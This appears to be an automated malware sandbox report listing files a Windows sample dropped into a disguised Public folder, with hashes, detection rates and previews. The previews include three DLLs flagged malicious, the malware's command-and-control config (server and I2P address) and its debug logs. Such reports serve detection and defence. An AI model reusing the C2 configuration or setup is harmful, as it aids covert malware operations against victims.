Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FC9.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6859490762661182
Encrypted:	false
SSDEEP:	96:TiZYWuoJO0YjY8WrHjUYEZt5tKimI35QwYO7jaad2MAifIWW3:2ZDb0D4Aaad2MAiwWW3
MD5:	5BE17F607546030D0FA2B945A23BA69F
SHA1:	5E4B316794FA60DB74D8D2D487B44B051D7E97A5
SHA-256:	047237E755C3E19AE940406EF46DFB8960C9B377AC7DE338399A5B201E9176AC
SHA-512:	2E70A923005BA2E10D1FE1ADC5DB2B5E84431708924F5AB2DF81DB560C73723061BC2AD7E5C203AAF6E4FB63056E67AAA9657ED87B384A69164755A580A5EED5
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.193969228624904
Encrypted:	false
SSDEEP:	1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
MD5:	EC9499EE84ED09B77BE0A35EC87B781C
SHA1:	4148D40284BAB415DDB828BD4061A4FE93C9AF26
SHA-256:	5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
SHA-512:	D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: cZO.exe, Detection: malicious, Browse Filename: DF2.exe, Detection: malicious, Browse Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3639
Entropy (8bit):	5.675612292618023
Encrypted:	false
SSDEEP:	96:idH9NYJ9VX3YPQYPTNYP6YPtYP/YPVsHQHhMyLOT58Lek1:AdNiTHXoNZ84UswBMHT561
MD5:	4E0EADA848022B5360521F2BD22925D6
SHA1:	7CB3B5DCE6F73C2A607235CDC1F5B45A9FADE17E
SHA-256:	9DB7484AF675B6691BD76FA61832F9AA0E832DAA7251DB85741DE12BCBFFBA19
SHA-512:	86A4BB178D3658DC3D446381036A5FDE02C6F306791A6ACBA50EA8D3386CE599FEBCACAFD0BC5F5111C94EC08A259BB96482C9B5BA35FC4D40862048D6E471A4
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.129024990254676
Encrypted:	false
SSDEEP:	6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
MD5:	7D88563AD41BAF4026CFC5D098CBF40D
SHA1:	442756834CCCEB84F219F3C762852437FBB3458E
SHA-256:	D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
SHA-512:	F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.236071662185895
Encrypted:	false
SSDEEP:	1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
MD5:	CE579A1BDCB9763DAFEBF01AD29F918C
SHA1:	F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
SHA-256:	0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
SHA-512:	EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: cZO.exe, Detection: malicious, Browse Filename: DF2.exe, Detection: malicious, Browse Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1021
Entropy (8bit):	5.449568174515338
Encrypted:	false
SSDEEP:	24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJDJF0ERDXYSae:CFdHS+54yclDYcm9FL/ff/P
MD5:	8A195246D205C46F7D683115E1106284
SHA1:	BA84FEA5A72817726F427DAB3BA1217CA13E1A6D
SHA-256:	C31BBFA8CA684604D7292E47C7C90D9D4B2140407A18CBC9CFE42C66D415CFB8
SHA-512:	111F3228C094C7BC4541DAC8E1D3758233BEE063F12F28DAED755148C0740DD6C9BFD5A9AEFC1B6BF2F75E1754AD0953EC95086D68837B068217721E6413A79F
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11741dbd)..[I] (tcp_connect) -> Done(sock=0x374,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.229119632298774
Encrypted:	false
SSDEEP:	1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
MD5:	7FEA520E80E7A73252F2A5C204BBF820
SHA1:	557D33F75805669A6D5E98D0E6CD3B790ECF3464
SHA-256:	64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
SHA-512:	6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: cZO.exe, Detection: malicious, Browse Filename: DF2.exe, Detection: malicious, Browse Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6080
Entropy (8bit):	5.40827259508853
Encrypted:	false
SSDEEP:	48:CFdHs54yclDYcm9FL/fzBMcF9EkGE4rkhE33NE1MEoF:idHrNYJ9VXzBt7EtEVEtEGEoF
MD5:	154026EBC0134A0A1DBF5815C79433EE
SHA1:	A2B9EA26C8BB521F32A29728301D2A1EF9554B97
SHA-256:	D912A0CBBA8B00628E492EE73325E2A099ED5919B3F4416972A68465488E0498
SHA-512:	55FA4424AD6FA8FBDD55C6AFF4C1ABF85C6D91534EDED58DF1C98969F8908F9C9B62561B14821AEB74026DEC68806BF9A1C1136DF322391EBEB7FDE4F8621EE4
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	75977
Entropy (8bit):	7.8696816318811385
Encrypted:	false
SSDEEP:	1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
MD5:	E53A179BB45CD7EDD8371740D65076BD
SHA1:	6B74034746E12C2058614A9DF671C31B79EAA7E9
SHA-256:	C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
SHA-512:	767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
Malicious:	false
Preview:	I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..\|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..\|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\av35pupiqnqp3ktgsz3cmvsgp5fktzuk77uw3lgdtr5hvcpl7poa.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.636058759913397
Encrypted:	false
SSDEEP:	12:b+9D/7PYhcX/J3dcKjDx3ZIV/CT4uuxZ1F0ifspE6Sp1dANFGkJ:bUDTwCc+wO4uoZ/0CmSp1W3R
MD5:	65FA96388D2EE8EC45C825ADFB1E2C77
SHA1:	FF9DB34131597C05E3B19FC7F45781F58F1DF67A
SHA-256:	2D3C714F1BC4C58B2CEE1CDCF158E0C50FDD552F2D3773DED4BC52BCF4948514
SHA-512:	E2BBBDBE5164C4F1FF140FAED3DFA7F22FC64CB4AAB4F4E2EA1842F299FB89B6D8423C37F7D41B308EA886C7802A0C56B26B1A1B4D8D46073F697986AD22D6B6
Malicious:	false
Preview:	nD...}...14...qL....y....1.O...~F7O;.j..........l.J0Y...{$....N.....Z.].t.(c.uz....-~m-.]......m.._.V.....`\|...o...3.X;...."=...I..m.k..~...=Oj/.y.cf.\.<8Q ..-.{{.z!..K..p.A..}.....@.r.`w.c1....s.Y...~/...O..8.SD...\|?.'m..y.v.R@...k;`..."......".P..{...\|....eB.CKF..\....C....r.....sH3...[S*..K".......a...(M.I...j"....W.93.{.C.<......7..TIv..O...gi...h.Q10. ......Bl+....K<$8Q..>..'iL....7....A.."....9#c~.g...`.T....y...4-]...\|.>#.g%......Z....WO..b.......+.N..s....VE.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\s322ojufi3uxlntm6dk3izbk77t3dgaempnioriks45etu7r2toq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.563573397798872
Encrypted:	false
SSDEEP:	12:1HrttcdKN7oE/YRPYFj8leuQqNX++AlhRIqC8+G9:1QQHEYFjuQi++uhRFC6
MD5:	7DBE35BA6E53B386B6E054570A620969
SHA1:	52BA8A269D5B2436A7FC1A800B8329CBABBB227D
SHA-256:	87C6E574D60A1670F036539CE7D5625B9E6EAC1BC462920652C655EDCE3587B6
SHA-512:	8EE0C73F27BBE837A64B51585549F43F0265465A494FA95453E63B395E862C31C2E0196B72F3E346B9613BBB111091E648CF708EB578317C037A1324F6493AD6
Malicious:	false
Preview:	.....n^.8....L.}.....$...7+,?....^!l ..4Z.....Y>.p...u.k....m..~.v .+{.......i.Ms......U..@L..2...o.z;.[hu..nwL..I..I.....M...ytfeN...;[c..J...2.;...0@....)....../.3...L).9..Q`G.:.#h/...lSr$N.9.._.fk..R.......5...8.^.6.....3.H.o..>........L7.I......M..=.e...R....L..c.MzV.Y....[.~'M:..-..t]WPE.....(d.l..Fl.% e.......-.}....H#.5O8......4".x;..]../:E.D{..m...J...k.e... ./m$....B.....`&$...{2..I)u.o...n..P.....DU&t8....k`7z4.o.+.k..`8.V4...=....'(P...wS..v}.3.e.Y.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\sqi2dpdxllcnw6ykmfjnmbf3hotcvfdyj6efczmcnmx2gmqbceha.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.570623799270768
Encrypted:	false
SSDEEP:	12:r093zkCAokpJDCQ0Oz73za17RJFGVz8jQSpd:WzFZkpJIO3D2RJ0RSQSn
MD5:	3EEA0C9B4365C0130D6F83F5FD67C979
SHA1:	2ECEB755876526CE5856C4904CF8E6DCC8E3EFCA
SHA-256:	BE8B00B8FE07A2071CB0BABD64B1966278B52B90E2883FB9FC6BB400621B4A14
SHA-512:	5B18B68B56178924BF4742505C850A423DAFE8510CCDC545A2C4223B76CB1E1FEC1603A586CA53D33AD46AE2913EB291B5C702FC5E6815A9A3F0ACC1D4ACA64D
Malicious:	false
Preview:	O..Q.8.tS.\.......FJr3j.W.]e'4wcS.s.......L.....b.LMmjm..4n1?=..pE.F.......'T..v.-.......:......GJ.E....y4...).:\|.K?..]Q.l..]E=.QZ.u..~..~...m.K..t7k...!Sj...s..9.3&.].X..p.:(...>\';.T?-..ZxX........5...wg.f.$./........].ad6n]......E.t....i..\..$...._f......c).cD1>...t.D.tQeR...i%.Y?UM.\.ctL5d...<\|E.x..Vf.hX.".N(.k.<....U. Pw]...q...K$...gT.V.J.~9.0.._..cI....E..iy.......yt....c.53 . z.._....X....X........W.sy>8.......k..B......4.H.. ;....Z_...XTf..;z...s..-.m?s3N..r..qD..S.=..5...Wc....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\tu26ghdj4ztstcndrw3l7cqmmxcj6ykgpgeplgydlcqkoeg4za7a.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.583816616503171
Encrypted:	false
SSDEEP:	12:AC+drKG9hzN6APtdjvm9Qjx7xmvem+9yZAGAiSRmb7IB:3IrK2h40thm9cxVmWm+M5dSRmQB
MD5:	9B60E2F601C964F30BE8BD65DF1920AE
SHA1:	F4ED503A4212E1FC9E74A6E535CC35CEB244C617
SHA-256:	0B8A169AC042ECAB63436EDF3395DC19C77D973FCD534B410DF0F0D87CE457E4
SHA-512:	D3AFA732967A8C5019E5019F73C8653C075B358D108459470CEBA42B49F9BA2B277BA6B7528A04CD98B389ADD7C40AE79355326AB3B9B23DE5C90B1E5355A260
Malicious:	false
Preview:	.....Loe...u..6p..............O...G.....}...H....Z;..i...R..orZ[.t$N:f../`....>o......\|.....[..d.......cn.00@<.._}.K.......W......{";....^..-......O1.(.G..].._l[......V.....n.K.*.Uy...8.h....Sl..(G..}....A98...Rt..-@v...,.>.../...}.....w.....l.4..c...i...~5...>y...Xm.4Yi...4.2.V.T..O.I.......h..lb......Z@.7.U....7xm..j.VL..~..j.9..=i.X..D}.Y%.(?.#.eM...y.W.%....E.c.>.....=..P.g4._.i...........2.r."...!..Y."...e=m.Z.U...n......5~.}.S.h.V.....~0...1e,.@.h.R..?...+....q....a....O......>

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	6.096928094887358
Encrypted:	false
SSDEEP:	3:s8gakRGVSOZudzJP7W8P7hM+6NNvUuLj8wJ:OakRkpIlP71FuvUuLj8wJ
MD5:	DAAC02B132D3EC46BFB296E5D39BBE19
SHA1:	FB35CCD7395F373E7828FA446E08BF1257AA8E6A
SHA-256:	36A0A41A2DDE65E207882F7F81386ED9ECCAB756FE530FC8362ADE5D9B3D62B4
SHA-512:	A9509B983CDF1565F754E3B6DC088EE268B572A5C17C2C6AEE0DB56CCECB5D65E1911480443BA74B64E30EF4B4657B0FBD0179C7C25637A84128B4BE18862C8B
Malicious:	false
Preview:	..r.3....................1L...58.....'........&........O.K.]F.L.:5....U.'..%.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	721
Entropy (8bit):	6.657155753224201
Encrypted:	false
SSDEEP:	12:RrSpomISpomISpomISpomISpomISpomISpomISpomISpomISpfSe03J7n98JhIwn:g7L7L7L7L7L7L7L7L7LKDJSG4rigVoK
MD5:	F621E7D35B80873765C7F178FC6A681C
SHA1:	B431BE308026FC97DC4F9F4B12B2849DC5FF4A05
SHA-256:	72B004878BC09CE325A148340E75ABF37A8357714EABAB3AD481B98EF35ED182
SHA-512:	3A7835FFBD6840ADCCE0E7B669FD1937D9A2FAA403225F7A9EF006BA5F0C8CEBFFE5C888DE727AA3307BF07BCD370B46A1AA615B36613003398FCC948A124A36
Malicious:	false
